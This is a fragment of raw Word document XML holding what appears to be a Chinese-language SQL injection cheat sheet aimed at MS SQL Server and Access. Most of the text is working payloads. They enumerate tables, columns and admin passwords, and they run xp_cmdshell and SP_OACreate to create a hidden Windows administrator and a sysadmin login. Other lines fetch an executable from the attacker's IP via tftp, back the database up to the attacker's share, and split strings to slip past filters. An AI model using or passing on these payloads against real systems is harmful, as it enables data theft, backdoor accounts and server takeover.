        <w:t xml:space="preserve">and uid&gt;(str(id))) </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001F1794">
        <w:t>暴到</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001F1794">
        <w:t>UID</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>的数值假设为</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>18779569 uid=id </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>and 0&lt;&gt;(select top 1 name from bbs.dbo.syscolumns where id=18779569) </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>得到一个</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>admin</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>的一个字段</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>假设为</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t xml:space="preserve"> user_id </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>and 0&lt;&gt;(select top 1 name from bbs.dbo.syscolumns where id=18779569 and </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>name not in </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t xml:space="preserve">('id',...)) </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>来暴出其他的字段</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t xml:space="preserve">and 0&lt;(select user_id from BBS.dbo.admin where username&gt;1) </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>可以得到用户名</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>依次可以得到密码。。。。。假设存在</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t xml:space="preserve">user_id username ,password </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>等字段</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>and 0&lt;&gt;(select count(*) from master.dbo.sysdatabases where name&gt;1 and </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>dbid=6) </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t xml:space="preserve">and 0&lt;&gt;(select top 1 name from bbs.dbo.sysobjects where xtype='U') </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>得到表名</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>and 0&lt;&gt;(select top 1 name from bbs.dbo.sysobjects where xtype='U' and name </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>not in('Address')) </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>and 0&lt;&gt;(select count(*) from bbs.dbo.sysobjects where xtype='U' and </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t xml:space="preserve">name='admin' and uid&gt;(str(id))) </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>判断</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>id</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>值</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t xml:space="preserve">and 0&lt;&gt;(select top 1 name from BBS.dbo.syscolumns where id=773577794) </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>所有字段</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,* from admin </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>?id=-1 union select 1,2,3,4,5,6,7,8,*,9,10,11,12,13 from admin </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>(union</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>access</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>也好用</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>) </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>得到</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>WEB</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>路径</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>;create table [dbo].[swap] ([swappass][char](255));-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>and (select top 1 swappass from swap)=1-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>;Create TABLE newtable(id int IDENTITY(1,1),paths varchar(500)) Declare </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>@test varchar(20) exec master..xp_regread @rootkey='HKEY_LOCAL_MACHINE', </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>@key='SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots\', </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:lastRenderedPageBreak/>
        <w:t>@value_name='/', values=@test OUTPUT insert into paths(path) </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>values(@test)-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>;use ku1;-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t xml:space="preserve">;create table cmd (str image);-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>建立</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>image</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>类型的表</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>cmd </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>存在</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>xp_cmdshell</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>的测试过程：</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>;exec master..xp_cmdshell 'dir' </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t xml:space="preserve">;exec master.dbo.sp_addlogin jiaoniang$;-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>加</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>SQL</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001F1794">
        <w:t>帐号</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>;exec master.dbo.sp_password null,jiaoniang$,1866574;-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>;exec master.dbo.sp_addsrvrolemember jiaoniang$ sysadmin;-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>;exec master.dbo.xp_cmdshell 'net user jiaoniang$ 1866574 /workstations:* </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>/times:all /passwordchg:yes /passwordreq:yes /active:yes /add';-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>;exec master.dbo.xp_cmdshell 'net localgroup administrators jiaoniang$ </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>/add';-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t xml:space="preserve">exec master..xp_servicecontrol 'start', 'schedule' </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>启动服务</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>exec master..xp_servicecontrol 'start', 'server' </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>; DECLARE @shell INT EXEC SP_OACreate 'wscript.shell',@shell OUTPUT EXEC </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>SP_OAMETHOD @shell,'run',null, 'C</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>\WINNT\system32\cmd.exe /c net user </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>jiaoniang$ 1866574 /add' </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>;DECLARE @shell INT EXEC SP_OACreate 'wscript.shell',@shell OUTPUT EXEC </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>SP_OAMETHOD @shell,'run',null, 'C</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>\WINNT\system32\cmd.exe /c net </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>localgroup administrators jiaoniang$ /add' </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t xml:space="preserve">'; exec master..xp_cmdshell 'tftp -i youip get file.exe'-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>利用</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>TFTP</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>上传文件</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>;declare @a sysname set @a='xp_'+'cmdshell' exec @a 'dir c:\' </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>;declare @a sysname set @a='xp'+'_cm</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001F1794">
        <w:t>’</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001F1794">
        <w:t>+</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001F1794">
        <w:t>’</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001F1794">
        <w:t>dshell' exec @a 'dir c:\' </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>;declare @a;set @a=db_name();backup database @a to </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>disk='</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>你的</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>IP</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>你的共享目录</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>bak.dat' </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>如果被限制则可以。</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001F1794">
        <w:t>select</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001F1794">
        <w:t xml:space="preserve"> * from openrowset('sqloledb','server';'sa';'','select ''OK!'' exec </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>master.dbo.sp_addlogin hax') </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>查询构造：</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t xml:space="preserve">Select * FROM news Where id=... AND topic=... </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001F1794">
        <w:t>AND ..... </w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>admin'and 1=(select count(*) from [user] where username='victim' and </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>right(left(userpass,01),1)='1') and userpass &lt;&gt;' </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>select 123;-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>;use master;-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t xml:space="preserve">:a' or name like 'fff%';-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>显示有一个叫</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>ffff</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>的用户哈。</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>and 1&lt;&gt;(select count(email) from [user]);-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>;update [users] set email=(select top 1 name from sysobjects where </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>xtype='u' and status&gt;0) where name='ffff';-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>;update [users] set email=(select top 1 id from sysobjects where xtype='u' </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>and name='ad') where name='ffff';-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>';update [users] set email=(select top 1 name from sysobjects where </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>xtype='u' and id&gt;581577110) where name='ffff';-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>';update [users] set email=(select top 1 count(id) from password) where </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:lastRenderedPageBreak/>
        <w:t>name='ffff';-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>';update [users] set email=(select top 1 pwd from password where id=2) </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>where name='ffff';-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>';update [users] set email=(select top 1 name from password where id=2) </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>where name='ffff';-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>上面的语句是得到数据库中的第一个用户表</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>并把表名放在</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>ffff</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>用户的邮箱字段中。</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>通过查看</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>ffff</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>的用户资料可得第一个用表叫</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>ad </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>然后根据表名</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>ad</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>得到这个表的</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t xml:space="preserve">ID </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>得到第二个表的名字</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>insert into users values( 666, </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), 0xffff)-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>insert into users values( 667,123,123,0xffff)-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>insert into users values ( 123, 'admin''--', 'password', 0xffff)-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>;and user&gt;0 </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>;and (select count(*) from sysobjects)&gt;0 </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>;and (select count(*) from mysysobjects)&gt;0 //</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>为</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>access</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>数据库</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>枚举出数据表名</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>;update aaa set aaa=(select top 1 name from sysobjects where xtype='u' and </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>status&gt;0);-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>这是将第一个表名更新到</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>aaa</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>的字段处。</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>读出第一个表，第二个表可以这样读出来（在条件后加上</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t xml:space="preserve"> and name&lt;&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>刚才得到的表名</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>'</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>）。</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>;update aaa set aaa=(select top 1 name from sysobjects where xtype='u' and </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>status&gt;0 and name&lt;&gt;'vote');-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>然后</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>id=1552 and exists(select * from aaa where aaa&gt;5) </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>读出第二个表，一个个的读出，直到没有为止。</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>读字段是这样：</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>;update aaa set aaa=(select top 1 col_name(object_id('</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>表名</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>'),1));-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>然后</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>id=152 and exists(select * from aaa where aaa&gt;5)</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>出错，得到字段名</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>;update aaa set aaa=(select top 1 col_name(object_id('</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>表名</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>'),2));-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>然后</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>id=152 and exists(select * from aaa where aaa&gt;5)</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>出错，得到字段名</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>获得数据表名</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>][</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>将字段值更新为表名，再想法读出这个字段的值就可得到表名</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>] </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t xml:space="preserve">update </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>表名</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t xml:space="preserve"> set </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>字段</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>=(select top 1 name from sysobjects where xtype=u and </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>status&gt;0 [ and name&lt;&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>你得到的表名</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>查出一个加一个</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t xml:space="preserve">]) [ where </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>条件</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>] select top 1 name from </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>sysobjects where xtype=u and status&gt;0 and name not in('table1','table2',…) </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>通过</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>SQLSERVER</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>注入</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001F1794">
        <w:t>漏洞建</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001F1794">
        <w:t>数据库管理员</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001F1794">
        <w:t>帐号</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001F1794">
        <w:t>和系统管理员</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001F1794">
        <w:t>帐号</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001F1794">
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>当前</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001F1794">
        <w:t>帐号</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001F1794">
        <w:t>必须是</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>SYSADMIN</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>组</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>] </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>获得数据表字段名</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>][</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>将字段值更新为字段名，再想法读出这个字段的值就可得到字段名</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>] </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t xml:space="preserve">update </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>表名</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t xml:space="preserve"> set </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>字段</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>=(select top 1 col_name(object_id('</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>要查询的数据表名</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>'),</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>字段</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001F1794">
        <w:t>列如</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001F1794">
        <w:t>:1) [ </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t xml:space="preserve">where </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>条件</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>] </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
